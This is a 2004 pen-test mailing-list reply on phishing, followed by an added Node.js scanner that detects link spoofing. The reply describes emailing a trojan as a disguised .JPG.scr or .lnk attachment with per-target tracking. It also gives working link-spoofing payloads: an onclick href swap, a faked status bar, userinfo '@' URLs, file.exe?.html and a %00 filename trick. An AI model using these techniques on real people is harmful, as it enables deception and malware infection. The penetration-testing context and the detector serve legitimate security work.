Re: Social Engineering Website (URL obfuscation/hiding)

From: Martin Mačok (martin.macok_at_underground.cz)
Date: 01/10/04

  • Next message: n30: "Auditing / Logging"
    Date: Sat, 10 Jan 2004 08:59:16 +0100
    To: pen-test@securityfocus.com
    
    

    On Fri, Jan 09, 2004 at 06:32:48AM -0800, Random Task wrote:

    > As a last note, we'd need to get people to go there. Making it look
    > legit would be good. (i.e. use the %00 IE exploit to make the URL
    > look like it's internal and make the site look like their own) Any
    > techniques or message styles you've used and had success with?

     - send the trojan code in an email attachment with a good old
       something.JPG.scr trick (if you can go to them, they don't have to
       go to you)
       - some content filters disallow .scr, so try .lnk also
     - send a link to the trojan file, in typical MS Outlook environment,
       they just have to click on it and select "Open"
       - use unique URL/file for each target (so you can track downloads
         and email forwards)

    URL obfuscation/hiding:

            <script language="JavaScript">
            <!--
            function changehref()
            {
               document.all("obj").href = "http://www.fakesite.com" ;
               return 1 ;
            }
            //-->
            </script>

            [snip]

            <a href="http://www.realsite.com/" id="obj"
            onclick="changehref();">www.fakesite.com</a>

    Similar trick:

            <a href="http://www.realsite.com"
            onmouseover="window.status=('http://www.fakesite.com/'); return
            true;">www.fakesite.com</a>

    A more recent scam trick:

            <a
            href="http://www.fakesite.com:something_ugly_long@www.realsite.com/">
            www.fakesite.com</a>

    Other MS IE trick (browser believes it's HTML instead of an EXE):
            
            http://server/file.exe?.html

    As you mention, MS IE's (and possibly some other browsers') %00 trick:
         
            README.TXT%00PROG.EXE in Content-disposition:
            (there are many different tricks with %00)

    See also:
    http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/IE/index.html
    http://www.solutions.fi/iebug2

    -- 
             Martin Mačok                 http://underground.cz/
       martin.macok@underground.cz        http://Xtrmntr.org/ORBman/
    ---------------------------------------------------------------------------
    ----------------------------------------------------------------------------
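Added example, not part of Martin's post: a small Node.js scanner that flags the link-spoofing patterns listed above when run over a mail body or page. The HTML sample is constructed here and reuses the placeholder hosts from the post (www.fakesite.com, www.realsite.com, server); the finding names (`userinfo-in-url`, `text-host-mismatch`, `handler-rewrites-target`, `exe-masked-by-query`) are this example's own labels. It uses the WHATWG `URL` parser to see the host the browser actually connects to, and regexes for anchor extraction, which is adequate for plain mail bodies but not a substitute for a real HTML parser.

```javascript
// Constructed sample mail body: one anchor per trick from the post, plus a benign control.
const SAMPLE_HTML = `
<p>Constructed test body.</p>
<a href="http://www.realsite.com/" id="obj" onclick="changehref();">www.fakesite.com</a>
<a href="http://www.realsite.com"
   onmouseover="window.status=('http://www.fakesite.com/'); return true;">www.fakesite.com</a>
<a href="http://www.fakesite.com:something_ugly_long@www.realsite.com/">www.fakesite.com</a>
<a href="http://server/file.exe?.html">Click here</a>
<a href="http://www.realsite.com/report">www.realsite.com</a>
`;

const ANCHOR_RE = /<a\b([^>]*)>([\s\S]*?)<\/a>/gi;
const ATTR_RE = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;

// Attribute string -> { name: value }, names lower-cased.
function parseAttrs(raw) {
  const attrs = {};
  for (const m of raw.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// Hostname a user would read from the visible link text ("www.fakesite.com",
// "http://www.fakesite.com/"), or null when the text is not URL-like ("Click here").
function hostFromText(text) {
  const t = text.replace(/<[^>]*>/g, '').trim();
  const m = t.match(/^(?:https?:\/\/)?([a-z0-9.-]+\.[a-z]{2,})(?:[\/:?#].*)?$/i);
  return m ? m[1].toLowerCase() : null;
}

function auditAnchor(attrsRaw, text) {
  const attrs = parseAttrs(attrsRaw);
  const findings = [];
  if (!attrs.href) return findings;
  let url;
  try { url = new URL(attrs.href); } catch { return [{ trick: 'unparseable-href', href: attrs.href }]; }
  const realHost = url.hostname.toLowerCase();

  // "fakesite.com:junk@realsite.com": everything before '@' is userinfo, not the host.
  if (url.username !== '' || url.password !== '') {
    findings.push({ trick: 'userinfo-in-url', href: attrs.href, realHost });
  }
  // Visible text names a host other than the one the href resolves to.
  const shown = hostFromText(text);
  if (shown && shown !== realHost && !realHost.endsWith('.' + shown)) {
    findings.push({ trick: 'text-host-mismatch', shown, realHost });
  }
  // Handlers that rewrite href, the status bar or location at hover/click time.
  for (const ev of ['onclick', 'onmouseover', 'onmousedown', 'onfocus']) {
    if (ev in attrs && /\b(href|window\.status|location)\b/i.test(attrs[ev])) {
      findings.push({ trick: 'handler-rewrites-target', event: ev, code: attrs[ev] });
    }
  }
  // "file.exe?.html": executable path with a query string that ends in .html.
  if (/\.(exe|scr|pif|com|bat|lnk)$/i.test(url.pathname) && /\.html?$/i.test(url.search)) {
    findings.push({ trick: 'exe-masked-by-query', path: url.pathname, query: url.search });
  }
  return findings;
}

function scanHtml(html) {
  const results = [];
  for (const m of html.matchAll(ANCHOR_RE)) results.push(...auditAnchor(m[1], m[2]));
  return results;
}

// The %00 Content-Disposition trick: percent-decode the filename and split on NUL
// to see both the name shown to the user and the name after the NUL.
function contentDispositionNames(headerValue) {
  const m = headerValue.match(/filename\*?=("?)([^";]+)\1/i);
  if (!m) return null;
  let decoded;
  try { decoded = decodeURIComponent(m[2]); } catch { decoded = m[2]; }
  const parts = decoded.split('\0');
  return { shown: parts[0], hidden: parts.length > 1 ? parts[parts.length - 1] : null };
}

for (const f of scanHtml(SAMPLE_HTML)) console.log(JSON.stringify(f));
console.log(contentDispositionNames('attachment; filename="README.TXT%00PROG.EXE"'));
```

The benign control anchor (text and host both www.realsite.com) produces no finding, and the `endsWith` check keeps "realsite.com" shown for a www.realsite.com link from being flagged; everything else in the sample is reported.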
    
